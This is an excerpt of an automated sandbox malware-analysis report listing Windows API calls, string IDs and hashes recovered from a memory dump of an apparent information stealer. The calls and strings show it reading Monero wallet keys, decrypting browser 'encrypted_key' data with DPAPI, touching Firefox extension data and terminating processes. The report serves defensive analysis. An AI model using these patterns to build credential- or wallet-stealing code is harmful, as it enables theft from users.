                    • Instruction Fuzzy Hash: 8DE1ED72850108AAEB48EBE4DC96EEE733AFF54304F50815DF51676091EF306A49CB6A
                    APIs
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                      • Part of subcall function 0064A9B0: lstrlen.KERNEL32(?,01449E88,?,\Monero\wallet.keys,00650E17), ref: 0064A9C5
                      • Part of subcall function 0064A9B0: lstrcpy.KERNEL32(00000000), ref: 0064AA04
                      • Part of subcall function 0064A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0064AA12
                      • Part of subcall function 0064A8A0: lstrcpy.KERNEL32(?,00650E17), ref: 0064A905
                      • Part of subcall function 00648B60: GetSystemTime.KERNEL32(00650E1A,0144B8B0,006505AE,?,?,006313F9,?,0000001A,00650E1A,00000000,?,01449E88,?,\Monero\wallet.keys,00650E17), ref: 00648B86
                      • Part of subcall function 0064A920: lstrcpy.KERNEL32(00000000,?), ref: 0064A972
                      • Part of subcall function 0064A920: lstrcat.KERNEL32(00000000), ref: 0064A982
                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0063D481
                    • lstrlen.KERNEL32(00000000), ref: 0063D698
                    • lstrlen.KERNEL32(00000000), ref: 0063D6AC
                    • DeleteFileA.KERNEL32(00000000), ref: 0063D72B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                    • String ID:
                    • API String ID: 211194620-0
                    • Opcode ID: 6efcf6b8c447623874603fbdf49eb4e1a4ee7e716074604aefb197d60a847fc2
                    • Instruction ID: b0d0dc033fa269b3461bfef3027fe79bb4efa09fde6071cf0a3cc854794a1d0b
                    • Opcode Fuzzy Hash: 6efcf6b8c447623874603fbdf49eb4e1a4ee7e716074604aefb197d60a847fc2
                    • Instruction Fuzzy Hash: 89910172850108AAEB48FBE0DC96DEE733AFF54304F51456CF507A6091EF346A49CB6A
                    APIs
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                      • Part of subcall function 0064A9B0: lstrlen.KERNEL32(?,01449E88,?,\Monero\wallet.keys,00650E17), ref: 0064A9C5
                      • Part of subcall function 0064A9B0: lstrcpy.KERNEL32(00000000), ref: 0064AA04
                      • Part of subcall function 0064A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0064AA12
                      • Part of subcall function 0064A8A0: lstrcpy.KERNEL32(?,00650E17), ref: 0064A905
                      • Part of subcall function 00648B60: GetSystemTime.KERNEL32(00650E1A,0144B8B0,006505AE,?,?,006313F9,?,0000001A,00650E1A,00000000,?,01449E88,?,\Monero\wallet.keys,00650E17), ref: 00648B86
                      • Part of subcall function 0064A920: lstrcpy.KERNEL32(00000000,?), ref: 0064A972
                      • Part of subcall function 0064A920: lstrcat.KERNEL32(00000000), ref: 0064A982
                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0063D801
                    • lstrlen.KERNEL32(00000000), ref: 0063D99F
                    • lstrlen.KERNEL32(00000000), ref: 0063D9B3
                    • DeleteFileA.KERNEL32(00000000), ref: 0063DA32
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                    • String ID:
                    • API String ID: 211194620-0
                    • Opcode ID: 702462ede763423fafe4d52fa792dbd16fd7ad7d8b08bc7fb2f07828d7e96c7c
                    • Instruction ID: 5959b264d08407b8f15bbf15420adb6956d90cad42ee2810ce7c355b212ce356
                    • Opcode Fuzzy Hash: 702462ede763423fafe4d52fa792dbd16fd7ad7d8b08bc7fb2f07828d7e96c7c
                    • Instruction Fuzzy Hash: 10810072950104AAEB48FBE0DC96EEE733AFF54304F51452CF406A6091EF346A49CBA6
                    APIs
                      • Part of subcall function 0064A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0064A7E6
                      • Part of subcall function 006399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006399EC
                      • Part of subcall function 006399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00639A11
                      • Part of subcall function 006399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00639A31
                      • Part of subcall function 006399C0: ReadFile.KERNEL32(000000FF,?,00000000,0063148F,00000000), ref: 00639A5A
                      • Part of subcall function 006399C0: LocalFree.KERNEL32(0063148F), ref: 00639A90
                      • Part of subcall function 006399C0: CloseHandle.KERNEL32(000000FF), ref: 00639A9A
                      • Part of subcall function 00648E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00648E52
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                      • Part of subcall function 0064A9B0: lstrlen.KERNEL32(?,01449E88,?,\Monero\wallet.keys,00650E17), ref: 0064A9C5
                      • Part of subcall function 0064A9B0: lstrcpy.KERNEL32(00000000), ref: 0064AA04
                      • Part of subcall function 0064A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0064AA12
                      • Part of subcall function 0064A8A0: lstrcpy.KERNEL32(?,00650E17), ref: 0064A905
                      • Part of subcall function 0064A920: lstrcpy.KERNEL32(00000000,?), ref: 0064A972
                      • Part of subcall function 0064A920: lstrcat.KERNEL32(00000000), ref: 0064A982
                    • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00651580,00650D92), ref: 0063F54C
                    • lstrlen.KERNEL32(00000000), ref: 0063F56B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                    • String ID: ^userContextId=4294967295$moz-extension+++
                    • API String ID: 998311485-3310892237
                    • Opcode ID: e699929599485fc60242b6d28880d44a6c7b37cd3b1d2de8450ded51cc72f3ac
                    • Instruction ID: 751f91f26d3546047b748572e1a66ba990918fc2232dca2fa5161e5f8145d2ff
                    • Opcode Fuzzy Hash: e699929599485fc60242b6d28880d44a6c7b37cd3b1d2de8450ded51cc72f3ac
                    • Instruction Fuzzy Hash: 33513075D50108BAEB54FBE0DC96DED733AEF54300F40852CF806A7191EE34AA09CBA6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrlen
                    • String ID:
                    • API String ID: 367037083-0
                    • Opcode ID: 665dc1aa99e7ae3a1842d92b0c208709a9b13f7828a7050d556f188d4d5d12c7
                    • Instruction ID: 6fac10ab2a284ce1db25d8c110793f3f86af2b6bee89ec286a0e2cda486d4c0a
                    • Opcode Fuzzy Hash: 665dc1aa99e7ae3a1842d92b0c208709a9b13f7828a7050d556f188d4d5d12c7
                    • Instruction Fuzzy Hash: 83416CB5D10209AFDB04EFE4D845AEEB776BF54304F008018E81676391EB74AA49CFA6
                    APIs
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                      • Part of subcall function 006399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006399EC
                      • Part of subcall function 006399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00639A11
                      • Part of subcall function 006399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00639A31
                      • Part of subcall function 006399C0: ReadFile.KERNEL32(000000FF,?,00000000,0063148F,00000000), ref: 00639A5A
                      • Part of subcall function 006399C0: LocalFree.KERNEL32(0063148F), ref: 00639A90
                      • Part of subcall function 006399C0: CloseHandle.KERNEL32(000000FF), ref: 00639A9A
                      • Part of subcall function 00648E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00648E52
                    • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00639D39
                      • Part of subcall function 00639AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nc,00000000,00000000), ref: 00639AEF
                      • Part of subcall function 00639AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00634EEE,00000000,?), ref: 00639B01
                      • Part of subcall function 00639AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nc,00000000,00000000), ref: 00639B2A
                      • Part of subcall function 00639AC0: LocalFree.KERNEL32(?,?,?,?,00634EEE,00000000,?), ref: 00639B3F
                      • Part of subcall function 00639B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00639B84
                      • Part of subcall function 00639B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00639BA3
                      • Part of subcall function 00639B60: LocalFree.KERNEL32(?), ref: 00639BD3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                    • String ID: $"encrypted_key":"$DPAPI
                    • API String ID: 2100535398-738592651
                    • Opcode ID: 5a57b5532348a03af21992030c31357deeb9031e531b3f5491ed5499af62218a
                    • Instruction ID: 5087af1566c39ee9e07b541c9321a543bfbd7ef59d92ffd713031116c5e1d63d
                    • Opcode Fuzzy Hash: 5a57b5532348a03af21992030c31357deeb9031e531b3f5491ed5499af62218a
                    • Instruction Fuzzy Hash: 93313EB6D10209ABCB04DBE4DC86AEFB7BAAF48304F144518E905A7241EB749A44CFA5
                    APIs
                    • memset.MSVCRT ref: 006494EB
                      • Part of subcall function 00648D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0064951E,00000000), ref: 00648D5B
                      • Part of subcall function 00648D50: RtlAllocateHeap.NTDLL(00000000), ref: 00648D62
                      • Part of subcall function 00648D50: wsprintfW.USER32 ref: 00648D78
                    • OpenProcess.KERNEL32(00001001,00000000,?), ref: 006495AB
                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 006495C9
                    • CloseHandle.KERNEL32(00000000), ref: 006495D6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                    • String ID:
                    • API String ID: 3729781310-0
                    • Opcode ID: 8a2901f1ee831ebf57a5f70b07253192b9be48972c42035d88db43262ae85395
                    • Instruction ID: 25bb92711604dbebda29ddbc115ae0a589a50c20dc3bf3b10e607af69e74ac21
                    • Opcode Fuzzy Hash: 8a2901f1ee831ebf57a5f70b07253192b9be48972c42035d88db43262ae85395
                    • Instruction Fuzzy Hash: B9312F71E40208AFDF18DFD0CD49BEEB779FB44701F204559E50AAB288DB749A85CB52
                    APIs
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,006505B7), ref: 006486CA
                    • Process32First.KERNEL32(?,00000128), ref: 006486DE
                    • Process32Next.KERNEL32(?,00000128), ref: 006486F3
                      • Part of subcall function 0064A9B0: lstrlen.KERNEL32(?,01449E88,?,\Monero\wallet.keys,00650E17), ref: 0064A9C5
                      • Part of subcall function 0064A9B0: lstrcpy.KERNEL32(00000000), ref: 0064AA04
                      • Part of subcall function 0064A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0064AA12
                      • Part of subcall function 0064A8A0: lstrcpy.KERNEL32(?,00650E17), ref: 0064A905
                    • CloseHandle.KERNEL32(?), ref: 00648761
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                    • String ID:
                    • API String ID: 1066202413-0
                    • Opcode ID: 657adb20da4a0a9f5d2f3ad332848ba7e930ca8cf39f3b066848c0876b1558d8
                    • Instruction ID: 070480f9126f1f684258da8023bb9b1443f6021f2b86b5576a055c8144a5b231
                    • Opcode Fuzzy Hash: 657adb20da4a0a9f5d2f3ad332848ba7e930ca8cf39f3b066848c0876b1558d8
                    • Instruction Fuzzy Hash: 5B314D71941218AFDB68DF94CC55FEEB77AFB45700F10419DE50AA21A0DB306A85CFA1
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00650E00,00000000,?), ref: 006479B0
                    • RtlAllocateHeap.NTDLL(00000000), ref: 006479B7
                    • GetLocalTime.KERNEL32(?,?,?,?,?,00650E00,00000000,?), ref: 006479C4
                    • wsprintfA.USER32 ref: 006479F3
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateLocalProcessTimewsprintf
                    • String ID:
                    • API String ID: 377395780-0
                    • Opcode ID: 814e500ac271a7a597c3050c96dcedac6177065febab67ea77c03afcfdc8acd1
                    • Instruction ID: 2ee3cb7d15c77bead6fa3e51ebe63f9c9c309de41a184d8b9191695e9922d58a
                    • Opcode Fuzzy Hash: 814e500ac271a7a597c3050c96dcedac6177065febab67ea77c03afcfdc8acd1
                    • Instruction Fuzzy Hash: 01112AB2904118ABCB14DFC9DD49BBEB7F8FB4CB11F14425AF605A2284D3399940C7B1
                    APIs
                    • __getptd.LIBCMT ref: 0064C74E
                      • Part of subcall function 0064BF9F: __amsg_exit.LIBCMT ref: 0064BFAF
                    • __getptd.LIBCMT ref: 0064C765
                    • __amsg_exit.LIBCMT ref: 0064C773
                    • __updatetlocinfoEx_nolock.LIBCMT ref: 0064C797
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                    • String ID:
                    • API String ID: 300741435-0
                    • Opcode ID: 1d5e5036a494fca952dd94781e83edbf032287b25de9267c21858ed25c959c15
                    • Instruction ID: e5bd4720d9e0f2d5c9c8a1779706a5d2a1863c881f69a4e894d94bc2e96830f1
                    • Opcode Fuzzy Hash: 1d5e5036a494fca952dd94781e83edbf032287b25de9267c21858ed25c959c15
                    • Instruction Fuzzy Hash: 71F09A32942700ABD7E0BFB89806B9E33A3AF00732F21614DF404A63D2DB6499419E5E
                    APIs
                      • Part of subcall function 00648DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00648E0B
                    • lstrcat.KERNEL32(?,00000000), ref: 00644F7A
                    • lstrcat.KERNEL32(?,00651070), ref: 00644F97
                    • lstrcat.KERNEL32(?,01449D28), ref: 00644FAB
                    • lstrcat.KERNEL32(?,00651074), ref: 00644FBD
                      • Part of subcall function 00644910: wsprintfA.USER32 ref: 0064492C
                      • Part of subcall function 00644910: FindFirstFileA.KERNEL32(?,?), ref: 00644943
                      • Part of subcall function 00644910: StrCmpCA.SHLWAPI(?,00650FDC), ref: 00644971
                      • Part of subcall function 00644910: StrCmpCA.SHLWAPI(?,00650FE0), ref: 00644987
                      • Part of subcall function 00644910: FindNextFileA.KERNEL32(000000FF,?), ref: 00644B7D
                      • Part of subcall function 00644910: FindClose.KERNEL32(000000FF), ref: 00644B92
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                    • String ID:
                    • API String ID: 2667927680-0
                    • Opcode ID: 7a376026027c5e75b124684f3306826b0c67700087dc973ddc443c93f9c082b9
                    • Instruction ID: a8d4f5d0ed1e8d0d846e7d1ea56a9a7787d271a94801fac0d88bb38452f3c452
                    • Opcode Fuzzy Hash: 7a376026027c5e75b124684f3306826b0c67700087dc973ddc443c93f9c082b9
                    • Instruction Fuzzy Hash: 0E219BB69002046BD794FBB0DC4AEED333EBB95301F004558B65D97185EE74DAC88B97